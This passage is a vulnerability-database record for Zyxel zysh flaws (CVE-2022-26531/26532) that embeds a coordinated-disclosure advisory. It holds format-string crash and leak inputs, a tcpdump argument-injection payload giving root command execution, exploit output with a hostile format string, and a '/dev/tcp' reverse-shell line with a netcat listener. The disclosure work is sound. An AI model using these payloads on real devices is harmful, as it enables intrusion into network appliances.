SIGSEGV, Segmentation fault. \n0x77bf6768 in vfprintf () from /lib32/libc.so.6\n(gdb) bt\n#0  0x77bf6768 in vfprintf () from /lib32/libc.so.6\n#1  0x77c14f44 in vsprintf () from /lib32/libc.so.6\n#2  0x77bfd980 in sprintf () from /lib32/libc.so.6\n#3  0x1000c38c in _ftext () \u003c\u003c do_ping()\n... \nRouter\u003e # crash\nRouter\u003e ping6 ::1 extension %n%n%n%n\nProgram received signal SIGSEGV, Segmentation fault. \n0x77bf6768 in vfprintf () from /lib32/libc.so.6\n\nRouter\u003e # crash\nRouter\u003e traceroute 127.0.0.1 extension %n%n%n%n\nProgram received signal SIGSEGV, Segmentation fault. \n0x77bf6768 in vfprintf () from /lib32/libc.so.6\n(gdb) bt\n#0  0x77bf6768 in vfprintf () from /lib32/libc.so.6\n#1  0x77c14f44 in vsprintf () from /lib32/libc.so.6\n#2  0x77bfd980 in sprintf () from /lib32/libc.so.6\n#3  0x1000be18 in _ftext () \u003c\u003c do_traceroute()\n... \nRouter\u003e # crash\nRouter\u003e traceroute6 ::1 extension %n%n%n%n\nProgram received signal SIGSEGV, Segmentation fault. \n0x77bf6768 in vfprintf () from /lib32/libc.so.6\n\nRouter\u003e # stack memory leak\nRouter\u003e nslookup 127.0.0.1 extension %x%x%x%x\nUsing domain server:\nName: 127.0.0.1\nAddress: 127.0.0.1#53\nAliases:\n\nHost 0bd01390 not found: 3(NXDOMAIN)\nRouter\u003e # crash\nRouter\u003e nslookup 127.0.0.1 extension %n%n%n%n\n\nProgram received signal SIGSEGV, Segmentation fault. \n0x77bf6768 in vfprintf () from /lib32/libc.so.6\n(gdb) bt\n#0  0x77bf6768 in vfprintf () from /lib32/libc.so.6\n#1  0x77c14f44 in vsprintf () from /lib32/libc.so.6\n#2  0x77bfd980 in sprintf () from /lib32/libc.so.6\n#3  0x1000c8c0 in _ftext () \u003c\u003c do_nslookup()\n... \nRouter\u003e # crash\nRouter\u003e nslookup6 ::1 extension %n%n%n%n\nProgram received signal SIGSEGV, Segmentation fault. \n0x77bf6768 in vfprintf () from /lib32/libc.so.6\n\nWe just confirmed that we control the format strings passed as argument to\nthe sprintf() API function in different locations of our target binary. \n\n\n--[ 4.5 - OS command injection in the \"packet-trace\" command\n\nThe OS command injection we identified in the code responsible for handling\nthe \"packet-trace\" command is located in the function at 0x10010258, which\nwe dubbed do_packet-trace(). \n\nThis function builds the command line for the /usr/sbin/tcpdump binary,\nbased on the arguments with which the \"packet-trace\" command is invoked. \nThe available arguments are:\n\nRouter# packet-trace\n;\n\u003ccr\u003e\ndst-host\nduration\nextension-filter\nfile\ninterface\nip-proto\nipv6-proto\nport\nsrc-host\n|\n\nThe \"extension-filter\" argument is particularly interesting, because it\nallows to specify additional arbitrary command-line arguments to be passed\nto tcpdump. For instance, if we enter the following zysh command:\n\nRouter# packet-trace extension-filter -ln -i lo -w -a -W 1 -G 1 -z id\n\nThe OS command line below will be executed via the function located at\n0x101295d0, which we dubbed my_invoke():\n\n$ /usr/sbin/tcpdump -n -i eth0 -ln -i lo -w -a -W 1 -G 1 -z id\n\nAs you can see, we are using a variation of a well-known GTFOBins payload\n[4] that allows us to execute the following OS command (yes, command-line\nswitches that begin with a \u0027-\u0027 are accepted):\n\n$ id -a\n\nRefer to the manual page of tcpdump [5] for further details on how each\ncommand-line switch is interpreted. Seeing it all in action from the Web\nConsole, as an authenticated admin or limited-admin user:\n\nRouter# packet-trace extension-filter -ln -i lo -w -a -W 1 -G 1 -z id\ntcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 65535 bytes\nMaximum file limit reached: 1\n1 packet captured\n2 packets received by filter\n0 packets dropped by kernel\nuid=0(root) gid=0(root) groups=0(root)\n\nWe got arbitrary command execution as root! We just need to find a way to\nexploit it to escape the restricted shell environment. \n\n\n--[ 5 - Exploitation\n\nIn the following sections, we will discuss exploitation of the identified\nvulnerabilities. \n\n\n--[ 5.1 - Buffer overflows\n\nThe zysh binary is in a sorry state when it comes to modern countermeasures\nagainst exploitation of memory corruption bugs:\n\n* No RELRO\n* No stack canary\n* NX disabled\n* No PIE\n* Has RWX segments\n\nThat said, it looks like the buffer overflow vulnerabilities described in\nthis advisory cannot be exploited to achieve arbitrary code execution after\nall, despite our gut feeling... In summary:\n\n* MIPS alphanumeric shellcode is not a thing [6]. \n* A pure ROP chain is also not feasible, at least with the memory mapping\n  used by the device and firmware version combination that we could test. \n\nWe can solve the first problem by storing our shellcode (along with a\ncopious number of NOP-equivalent opcodes) in the value of the TERM\nenvironment variable that gets passed to the remote system via sshd (or\nin.telnetd). At this point, we still need to be able to overwrite the\nstored return address with a value that points to our NOP sled and\nshellcode payload, though. Unfortunately, a partial overwrite would not\nwork in this case, because our target architecture is big endian and\ntherefore we would only be able to overwrite the most significant byte(s),\nachieving nothing of note. On a device and firmware combination with a\nslightly different memory mapping, however, we might be able to pull this\noff and hijack the control flow. \n\nWe are not well-versed in the fine and obscure art of MIPS shellcoding and\nexploitation, so we might have missed something. Feel free to try this\nchallenge on your own!\n\nAs a final note, we also looked into the possibility to exploit the many\nunsafe calls to system() present in the code in order to inject arbitrary\nOS commands. However, we could not slip past the pretty aggressive input\nfilters implemented by zysh. Too bad. \n\n\n--[ 5.2 - Format string bugs\n\nAs discussed earlier, we control the format strings passed as argument to\nthe sprintf() API function in different locations of our target binary. As\na proof of concept, this allowed us to leak stack memory contents and crash\nzysh. \n\nIt is now time to see if we are able to exploit the identified format\nstring bugs to execute arbitrary code and escape the restricted shell\nenvironment... At first glance, this does not look feasible, because once\nagain we are limited in the characters that we can use in our hostile\nbuffer (alphanumeric characters plus some special characters in the 7-bit\nASCII set). \n\nHowever, we devised a workaround: instead of placing our retloc addresses\nat the beginning of the hostile format string as is customary, we can\ninject them in the process memory via the TERM environment variable! The\ndirect parameter access feature of glibc, together with our very own format\nstring exploitation technique for RISC architectures [7], will do the rest. \n\nLong story short, we put together a proof-of-concept exploit [8] that does\nthe following:\n\n* Authenticate and access the target zysh via SSH, injecting our payload\n  (retloc sled + NOP sled + shellcode + padding) via the TERM environment\n  variable. \n\n* Leak a stack address via the format string bug in the \"ping\" command, and\n  use it to calculate the address of our injected shellcode near the bottom\n  of the stack, which changes slightly at each zysh execution. \n\n* Craft another hostile format string to use as an argument to the \"ping\"\n  command and overwrite the .got entry of fork(), which gets called right\n  after the vulnerable sprintf(), with the shellcode address, using a\n  variation of our write-one-byte-at-a-time technique designed for RISC\n  architectures such as MIPS and SPARC. \n\n* Interact with the spawned bash shell!\n\nWe initially thought that Python/Paramiko would be a good language choice\nfor the implementation, but we quickly changed our mind. In the end, we\ndecided to go full old-school and developed our exploit in Tcl/Expect. \nHere it is in action:\n\nraptor@blumenkraft ~ % ./raptor_zysh_fhtagn.exp \u003cREDACTED\u003e admin password\nraptor_zysh_fhtagn.exp - zysh format string PoC exploit\nCopyright (c) 2022 Marco Ivaldi \u003craptor@0xdeadbeef.info\u003e\n\nLeaked stack address:\t0x7fe97170\nShellcode address:\t0x7fe9de40\nBase string length:\t46\nHostile format string:\t%.18u%1801$n%.169u%1801$hn%.150u%1801$hhn%.95u%1802$hhn\n\n*** enjoy your shell! ***\n\nsh-5.1$ uname -snrmp\nLinux USG20-VPN 3.10.87-rt80-Cavium-Octeon mips64 Cavium Octeon III V0.2 FPU V0.0\nsh-5.1$ id\nuid=10007(admin) gid=10000(operator) groups=10000(operator)\n\nOnce we have access to a bash shell on the underlying embedded Linux OS, it\nshould be pretty easy to escalate privileges to root, by leveraging local\nvulnerabilities [1]. \n\nIt should not be too hard to automate/weaponize our exploit to make it work\nagainst other targets. This is left as an exercise. \n\nIn conclusion, format string bugs are a powerful exploit primitive, one of\nour favorites. Once again, they proved to be up to the task even in a\nconstrained scenario such as the one we described. \n\n\n--[ 5.3 - OS command injection\n\nWe managed to find a way to execute arbitrary OS commands by injecting\nspecially-crafted arguments into the tcpdump command line. However,\nexploitation of this vulnerability to escape the restricted shell\nenvironment is not straightforward, due to a number of constraints:\n\n* We can only execute OS commands that do something useful to reach our\n  goal when invoked with exactly one command-line argument. \n\n* Executing \"bash -i\" (or similar commands such as gdb and python) directly\n  does not work, because the shell would die with a \"Bad file descriptor\"\n  error or similar. \n\n* We could upload a shellcode binary via the FTP service (enabled by\n  default on our test device) in the /etc/zyxel/ftp/tmp directory, but to\n  be able to execute it we would need to find a way to turn the file\u0027s\n  executable bit on; we might also be able to abuse some zysh functionality\n  to create an executable file in /etc/zyxel/ftp/tmp that we can later\n  overwrite via FTP or some other means that keep the executable bit on,\n  but we could not find an immediate way to do this. \n\n* We even crafted plain-text traffic to inject arbitrary commands into the\n  pcap output file saved by tcpdump, and tried executing this file as a\n  bash script, but bash would refuse to run it (\"cannot execute binary\n  file\"). \n\n* Alternatively, we could directly upload a shell script via FTP and\n  run it as an argument to bash, but before its execution it would get\n  overwritten by tcpdump; in theory, we could try winning a race by\n  continuously uploading the shell script while tcpdump is executing. \n  Luckily, before we had to implement this, we found a better way. \n\nWe were indeed lucky in finding almost by accident the reliable way to\nexploit this vulnerability that we are going to describe, which involves\nthe use of standard output as a tcpdump output file (\"-w -\" command-line\noption) and some eldritch file descriptor trickery. \n\nIn order to escape the restricted shell environment and execute arbitrary\ncommands as root on the underlying embedded Linux OS, first authenticate to\nthe Web Console at https://\u003cREDACTED\u003e/webconsole/ as either an admin or\nlimited-admin user. Then, run the following commands:\n\nRouter# packet-trace extension-filter -ln -i lo -w - -W 1 -G 1 -z python\ntcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 65535 bytes\n... \nMaximum file limit reached: 1\n5 packets captured\n10 packets received by filter\n0 packets dropped by kernel\nRouter# Python 2.7.14 (default, Sep 23 2021, 23:30:37)\n[GCC 4.7.0] on linux2\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information. \n\u003e\u003e\u003e\n[press enter a few times]\nRouter#\nRouter#\nRouter# packet-trace extension-filter -ln -i lo -w - -W 1 -G 1 -z bash\ntcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 65535 bytes\n... \nMaximum file limit reached: 1\n5 packets captured\n10 packets received by filter\n0 packets dropped by kernel\nRouter# #\n[press enter again]\n  File \"\u003cstdin\u003e\", line 1\n    ^\nSyntaxError: invalid syntax\n\u003e\u003e\u003e import os\n\u003e\u003e\u003e os.system(\"bash -i \u003e\u0026 /dev/tcp/\u003cREDACTED\u003e/23234 0\u003e\u00261\")\n\nThis will get you a privileged reverse shell:\n\nraptor@gollum:~$ nc -nvlp 23234\nListening on 0.0.0.0 23234\nConnection received on \u003cREDACTED\u003e 54330\nbash: cannot set terminal process group (25792): Inappropriate ioctl for device\nbash: no job control in this shell\nbash-5.1# uname -a\nuname -a\nLinux USG20-VPN 3.10.87-rt80-Cavium-Octeon #2 Fri Sep 24 00:34:21 CST 2021 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7010p1.2-800-AAP) GNU/Linux\nbash-5.1# id\nid\nuid=0(root) gid=10000(operator) groups=0(root),10000(operator)\nbash-5.1#\n\nOf course, you can choose to execute your favorite Python code instead. \n\nApparently, we managed to find a way to connect the standard input of the\nWeb Console to the standard input of the python process we spawned with the\nfirst command, in a mind-bending exploit. To preserve our sanity, we have\nnot thoroughly investigated how this is happening... but it works! And it\nis very reliable. \n\nOn our test device, this exploitation vector only works from the Web\nConsole, as an authenticated admin or limited-admin user. As an added\nbenefit, as we have seen, the Web Console spawns zysh as root. \n\nWe do not exclude other ways to exploit the described vulnerability,\nperhaps by creating or overwriting critical system files. It could also be\neasily abused to clobber arbitrary files and cause a Denial of Service\ncondition on vulnerable devices, although we are not going to provide a\nproof-of-concept exploit for this (we are pretty sure you can easily figure\nit out on your own anyway). \n\n\n--[ 6 - Affected products\n\nAccording to Zyxel, zysh is present on a wide range of products, including\ntheir security appliances such as FLEX, ATP, USG, VPN, and ZyWALL [9], AP\ncontrollers and APs. \n\nOur audit was conducted exclusively on a Zyxel USG20-VPN test device with\nFirmware 5.10. However, other products and firmware versions have been\nconfirmed by Zyxel to be affected by the same vulnerabilities. \n\n\n--[ 7 - Remediation\n\nDuring the whole coordinated disclosure process, Zyxel was very responsive. \nWorking with them has been a pleasure and we would like to publicly\nacknowledge it, as unfortunately this is not always the case with every\nvendor. \n\nThe memory corruption bugs were collectively assigned CVE-2022-26531, while\nthe OS command injection vulnerability was assigned CVE-2022-26532. Please refer\nto their advisory for patching information. \n\nWe have not checked the effectiveness of the fixes. \n\n\n--[ 8 - Disclosure timeline\n\n2022-02-25: Zyxel was notified via \u003csecurity@zyxel.com.tw\u003e. \n2022-02-25: Zyxel acknowledged our vulnerability reports. \n2022-03-17: Zyxel assigned CVE-2022-26531 and CVE-2022-26532 to the\n\t    reported issues and informed us of their intention to publish\n            their security advisory on 2022-05-24. \n2022-03-18: As a token of their appreciation, Zyxel gave us a certificate\n            of recognition. \n2022-05-24: Zyxel published their security advisory, following our\n            coordinated disclosure timeline. \n2022-06-07: HN Security published this advisory with full details. \n\n\n--[ 9 - References\n\n[0] https://www.zyxel.com/\n[1] https://security.humanativaspa.it/tag/zyxel/\n[2] https://www.dropbox.com/s/kvm5xwxqfrwge0t/USG20-VPN_5.10.zip?dl=1\n[3] https://en.wikipedia.org/wiki/MIPS_architecture\n[4] https://gtfobins.github.io/gtfobins/tcpdump/\n[5] https://www.tcpdump.org/manpages/tcpdump.1.html\n[6] https://twitter.com/pulsoid/status/1368146791473045504\n[7] http://phrack.org/issues/70/13.html#article\n[8] https://github.com/0xdea/exploits/blob/master/zyxel/raptor_zysh_fhtagn.exp\n[9] https://support.zyxel.eu/hc/en-us/articles/360013941859\n\n\nCopyright (c) 2022 Marco Ivaldi and Humanativa Group. All rights reserved",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-26532"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-26532"
      },
      {
        "db": "PACKETSTORM",
        "id": "167464"
      }
    ],
    "trust": 1.08
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "PACKETSTORM",
        "id": "167464",
        "trust": 1.8
      },
      {
        "db": "NVD",
        "id": "CVE-2022-26532",
        "trust": 1.8
      },
      {
        "db": "CS-HELP",
        "id": "SB2022052406",
        "trust": 0.6
      },
      {
        "db": "CXSECURITY",
        "id": "WLB-2022060063",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202205-3999",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-26532",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-26532"
      },
      {
        "db": "PACKETSTORM",
        "id": "167464"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-26532"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202205-3999"
      }
    ]
  },
  "id": "VAR-202205-1789",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.35069445
  },
  "last_update_date": "2023-12-18T13:22:22.970000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Zyxel USG/ZyWALL Fixes for operating system command injection vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=195230"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/hnsecurity/vulns "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-26532"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202205-3999"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-78",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-26532"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://packetstormsecurity.com/files/167464/zyxel-buffer-overflow-format-string-command-injection.html"
      },
      {
        "trust": 1.8,
        "url": "https://www.zyxel.com/support/multiple-vulnerabilities-of-firewalls-ap-controllers-and-aps.shtml"
      },
      {
        "trust": 1.7,
        "url": "http://seclists.org/fulldisclosure/2022/jun/15"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022052406"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/issue/wlb-2022060063"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/cveshow/cve-2022-26532/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/78.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/hnsecurity/vulns"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://security.humanativaspa.it/tag/zyxel/"
      },
      {
        "trust": 0.1,
        "url": "https://www.zyxel.com/"
      },
      {
        "trust": 0.1,
        "url": "https://www.dropbox.com/s/kvm5xwxqfrwge0t/usg20-vpn_5.10.zip?dl=1"
      },
      {
        "trust": 0.1,
        "url": "https://www.tcpdump.org/manpages/tcpdump.1.html"
      },
      {
        "trust": 0.1,
        "url": "https://support.zyxel.eu/hc/en-us/articles/360013941859"
      },
      {
        "trust": 0.1,
        "url": "http://phrack.org/issues/70/13.html#article"
      },
      {
        "trust": 0.1,
        "url": "https://gtfobins.github.io/gtfobins/tcpdump/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-26531"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-26532"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/hnsecurity/vulns/blob/main/hns-2022-02-zyxel-zysh.txt"
      },
      {
        "trust": 0.1,
        "url": "https://twitter.com/pulsoid/status/1368146791473045504"
      },
      {
        "trust": 0.1,
        "url": "https://security.humanativaspa.it/"
      },
      {
        "trust": 0.1,
        "url": "https://\u003credacted\u003e/webconsole/"
      },
      {
        "trust": 0.1,
        "url": "https://en.wikipedia.org/wiki/mips_architecture"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/0xdea/exploits/blob/master/zyxel/raptor_zysh_fhtagn.exp"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-26532"
      },
      {
        "db": "PACKETSTORM",
        "id": "167464"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-26532"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202205-3999"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2022-26532"
      },
      {
        "db": "PACKETSTORM",
        "id": "167464"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-26532"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202205-3999"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-05-24T00:00:00",
        "db": "VULMON",
        "id": "CVE-2022-26532"
      },
      {
        "date": "2022-06-19T15:26:57",
        "db": "PACKETSTORM",
        "id": "167464"
      },
      {
        "date": "2022-05-24T06:15:09.390000",
        "db": "NVD",
        "id": "CVE-2022-26532"
      },
      {
        "date": "2022-05-24T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202205-3999"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-06-19T00:00:00",
        "db": "VULMON",
        "id": "CVE-2022-26532"
      },
      {
        "date": "2022-06-19T19:15:08.557000",
        "db": "NVD",
        "id": "CVE-2022-26532"
      },
      {
        "date": "2022-06-21T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202205-3999"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202205-3999"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Zyxel USG/ZyWALL Operating system command injection vulnerability",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202205-3999"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "operating system commend injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202205-3999"
      }
    ],
    "trust": 0.6
  }
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.